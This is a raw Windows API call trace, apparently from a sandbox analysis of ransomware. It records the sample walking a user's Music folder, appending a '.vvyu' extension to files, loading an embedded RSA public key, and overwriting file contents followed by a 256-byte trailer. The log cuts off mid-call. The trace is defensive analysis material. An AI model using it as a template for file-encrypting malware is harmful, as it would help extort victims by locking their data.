1 [0201.240] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\hyXqTEnB.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\_fbv4xgh8clctd- y4\\hyxqtenb.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\hyXqTEnB.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\_fbv4xgh8clctd- y4\\hyxqtenb.mp3.vvyu")) returned 1 [0201.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.241] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.241] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0201.244] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a78aee0, ftCreationTime.dwHighDateTime=0x1d8a0ae, ftLastAccessTime.dwLowDateTime=0xa4e20820, ftLastAccessTime.dwHighDateTime=0x1d8a14d, ftLastWriteTime.dwLowDateTime=0xa4e20820, ftLastWriteTime.dwHighDateTime=0x1d8a14d, nFileSizeHigh=0x0, nFileSizeLow=0x29d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="T lAIuy5VUmxfxAcJn.wav", cAlternateFileName="TLAIUY~1.WAV")) returned 1 [0201.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ceb8 [0201.244] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6ead8 [0201.244] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ceb8 | out: hHeap=0x620000) returned 1 [0201.244] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\T lAIuy5VUmxfxAcJn.wav") returned=".wav" [0201.244] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\mXrqWFqcp\\_fBV4xgh8cLcTD- y4\\T lAIuy5VUmxfxAcJn.wav" (normalized: "c:\\users\\keecfmwgj\\music\\mxrqwfqcp\\_fbv4xgh8clctd- y4\\t laiuy5vumxfxacjn.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0201.245] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=10712) returned 1 [0201.245] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0201.248] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x29b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.248] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0201.250] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.251] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.251] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0201.251] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x29d8, lpOverlapped=0x0) returned 1 [0201.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0201.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.252] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0201.252] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c300) returned 1 [0201.253] CryptCreateHash (in: hProv=0x67c300, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0201.253] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0201.253] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0201.253] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0201.253] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0201.253] GetLastError () returned 0x0 [0201.254] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0201.254] CryptReleaseContext (hProv=0x67c300, dwFlags=0x0) returned 1 [0201.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.254] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.254] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.254] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.254] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.254] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x29e0) returned 0x2ea99b0 [0201.254] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fcd8 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea33f8 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e8fd20 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3410 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3440 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34a0 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3458 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.255] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.255] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.255] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.256] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34a0 [0201.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0201.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3458 [0201.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3440 [0201.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0201.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99c10 [0201.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.256] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99af8 [0201.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d88 [0201.257] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.257] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.258] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.259] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.259] GetCurrentThreadId () returned 0x66c [0201.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea86b8 [0201.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0201.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.259] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.260] GetCurrentThreadId () returned 0x66c [0201.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.260] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.260] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.261] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.261] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea34a0 [0201.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3440 [0201.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0201.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3458 [0201.262] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0201.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3428 [0201.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34b8 [0201.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0201.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3488 [0201.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3470 [0201.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea34d0 [0201.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3470 [0201.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3488 | out: hHeap=0x620000) returned 1 [0201.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a70 [0201.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.263] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.263] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3440 [0201.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34a0 | out: hHeap=0x620000) returned 1 [0201.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0201.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34d0 | out: hHeap=0x620000) returned 1 [0201.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99d28 [0201.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0201.264] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3440 | out: hHeap=0x620000) returned 1 [0201.264] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.265] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0201.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3470 | out: hHeap=0x620000) returned 1 [0201.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea34b8 | out: hHeap=0x620000) returned 1 [0201.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3458 | out: hHeap=0x620000) returned 1 [0201.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3428 | out: hHeap=0x620000) returned 1 [0201.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3410 | out: hHeap=0x620000) returned 1 [0201.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8fd20 | out: hHeap=0x620000) returned 1 [0201.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.269] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.270] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.271] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.271] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x29d3, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x29d3, lpOverlapped=0x0) returned 1 [0201.272] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.272] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x29d8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.272] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.273] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.273] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 